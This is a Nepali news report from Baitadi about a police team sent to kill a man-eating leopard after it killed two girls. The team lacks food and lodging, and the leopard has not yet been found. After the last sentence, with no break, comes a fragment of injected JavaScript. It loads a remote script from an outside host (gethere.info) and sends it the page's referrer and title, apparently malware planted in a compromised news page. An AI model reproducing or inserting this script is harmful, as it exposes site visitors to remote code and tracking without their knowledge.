मान्छे खाने चितुवा मार्न गएका प्रहरीलाई नै समस्या

बैतडी, ७ असोज – बैतडीको तल्लोसोराडमा नरभक्षी चितुवा मार्नका लागि खटिएको प्रहरी टोलीलाई खान तथा बसोबासको समस्या भएको छ ।

तल्लोसोराडको उदयदेवमा गएको भदौ महिनामा चितुवाको आक्रमणबाट दुई बालिकाको ज्यान लिएपछि जिल्ला सुरक्षा समितिको आकस्मिक बैठकले चितुवालाई मार्ने निर्णय गरेको थियो । भदौ १९ गते जिल्ला प्रशासन कार्यालयमा बसेको सुरक्षा समितिको आकस्मिक बैठकले स्थानीय प्रशासन ऐन, २०२८ को दफा ९(४) बमोजिम नरभक्षी चितुवालाई मार्नका लागि तत्काल हतियारसहित नेपाल प्रहरी खटाउने निर्णय गरेको थियो । सोही निर्णयबमोजिम १५ जना प्रहरीको टोली प्रभावित क्षेत्रमा खटाएको हो ।

प्रहरीको टोली स्वास्थ्यचौकीको भवनमा बसिरहेको छ भने स्थानीयवासीसँग भाँडाकुँडा मागेर आफँैले पकाएर खाने व्यवस्था गरेको छ । चितुवा मार्नका लागि प्रहरीको टोली खटिएयता चितुवा भने कतै देखा नपरेको बताइएको छ ।

प्रहरी सहायक निरीक्षक लोकेन्द्र खड्काको नेतृत्वमा रहेको प्रहरी टोलीले रातदिन गस्ती गरेको भएपनि नरभक्षी चितुवा भने अहिलेसम्म फेला पार्न नसकेको जिल्ला प्रहरी कार्यालय बैतडीका प्रमुख प्रहरी नायब उपरीक्षक बालनरसिंह राणाले जानकारी दिए ।बैतडीको तल्लोस्वराडमा २०६८ सालदेखि हालसम्म २२ जनाको चितुवाको आक्रमणबाट ज्यान गइसकेको छ ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...